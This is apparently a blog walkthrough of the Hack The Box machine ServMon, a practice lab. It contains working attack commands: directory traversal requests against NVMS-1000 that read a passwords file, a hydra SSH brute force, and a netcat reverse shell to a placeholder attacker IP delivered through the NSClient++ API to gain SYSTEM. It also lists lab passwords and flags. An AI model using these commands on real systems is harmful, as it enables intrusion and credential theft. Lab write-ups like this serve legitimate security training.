Hello Everyone, This is simple hack the box walk through of machine name as ServMon which have 10.10.10.184 IP address.

#nmap

$nmap -sV -sC -Pn 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 09:03 EDT
Nmap scan report for 10.10.10.184
Host is up (0.57s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|01-18-20 12:05PM
Users | ftp-syst: | SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
|
| | |
| | window.location.href = "Pages/login.htm"; |
| | | |
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|http-title: Site doesn't have a title (text/html). 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5666/tcp open tcpwrapped 6699/tcp open napster? 8443/tcp open ssl/https-alt | fingerprint-strings: | FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: | HTTP/1.1 404 | Content-Length: 18 | Document not found | GetRequest: | HTTP/1.1 302 | Content-Length: 0 | Location: /index.html | workers | jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=6/19%Time=5EECB7DC%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20
\r\n\x20\ SF:x20\x20\x20\r\n\x20\x20\x20\x20\x20 SF:\x20\x20\x20window.location.href\x20=\x20\"Pages/login.htm\";\r\n\x2 SF:0\x20\x20\x20\r\n\r\n\r\n\r\n\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20
\r\n\x20\x20\x SF:20\x20\r\n\x20\x20\x20\x20\x20\x20\ SF:x20\x20window.location.href\x20=\x20\"Pages/login.htm\";\r\n\x20\x20 SF:\x20\x20\r\n\r\n\r\n\r\n\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf\r\n\r\n\r\n\r\n\x20\x20\x20\x20
\r\n\x20\x20\x20\x2 SF:0\r\n\x20\x20\x20\x20\x20\x20\x20\x SF:20window.location.href\x20=\x20\"Pages/login.htm\";\r\n\x20\x20\x20\ SF:x20\r\n\r\n\r\n\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/19%Time=5EECB7E9%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\
SF:x18\x9e\x02\x12")%r(HTTPOptions,36,"HTTP/1.1\x20404\r\nContent-Length:
SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1
SF:.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r
SF:(RTSPRequest,36,"HTTP/1.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum
SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1.1\x20404\r\nContent-Leng
SF:th:\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: 4m25s | smb2-security-mode: | 2.02: | Message signing enabled but not required
| smb2-time:
| date: 2020-06-19T13:11:04
|_ start_date: N/A

Got open port FTP 21 which allows anonymous login, and found Confidential.txt in folder of Nadine user.

Also check for port 80 default http service running with NVMS – 1000 and after some search also find the directory traversal issue.

https://www.exploit-db.com/exploits/47774

#Request:
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.184/
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

#Response:
HTTP/1.1 200 OK
Content-type:
Content-Length: 92
Connection: close
AuthInfo:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

As per Confidential.txt able to get Passwords.txt locate at desktop in Nathan user folder.

#Request:
GET /../../../../../../../../../../../../Users/Nathan/Desktop/Passwords.txt HTTP/1.1
Host: 10.10.10.184
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.184/
Connection: close
Cookie: dataPort=6063
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

#Response:
HTTP/1.1 200 OK
Content-type: text/plain
Content-Length: 156
Connection: close
AuthInfo:
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
[email protected]
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

and got hash from Passwords.txt as well as we know two username Nadine and Nathan. So decide to brute force and create a file user include username (Nadine and Nathan) as well as pass file include hashes. and done brute force by hydra, got password for user nadine.

$hydra -L user -P pass 10.10.10.184 ssh
[22][ssh] host: 10.10.10.184 login: nadine password: [email protected]
Login to SSH:
[email protected]:~# ssh [email protected]
[email protected]'s password:
Microsoft Windows [Version 10.0.18363.752]
© 2019 Microsoft Corporation. All rights reserved.
[email protected]RVMON C:\Users\Nadine>

#user flag

[email protected] C:\Users\Nadine>cd Desktop
[email protected] C:\Users\Nadine\Desktop>type user.txt
cf117f0d01d73a1f419b521fdf0b8dd1
[email protected] C:\Users\Nadine\Desktop>

Now check that NSClient service is running as well as get the password.

[email protected] C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

Create a .bat file name as me.bat to get reverse connection using netcat on our local Kali machine as well place it in www/html folder and nc.exe too.

@Echo off
C:\tmp\nc.exe -e 10.10.X.X 4444 powershell

Lets download the me.bat file as well as nc.exe and used password ew2x6SsGTxjRwXOT

[email protected] C:>powershell.exe wget "http://10.10.X.X/nc.exe" -outfile "c:\temp\nc.exe"
[email protected] C:>powershell.exe wget "http://10.10.X.X/me.bat" -outfile "c:\temp\me.bat"

Go to new terminal of kali and start nc listener.

[email protected]:~# nc -lvnp 4444
listening on [any] 4444 …

#root flag

Now lets run curl commands

[email protected] C:\Temp>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/me.bat --data-binary "C:\Temp\nc.exe 10.10.X.X 4444 -e cmd.exe"
[email protected] C:\Temp>curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/me…te?time=3m

Check nc listener for connection

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Go to Desktop and will find root.txt

LEAVE A REPLY

Please enter your comment!
Please enter your name here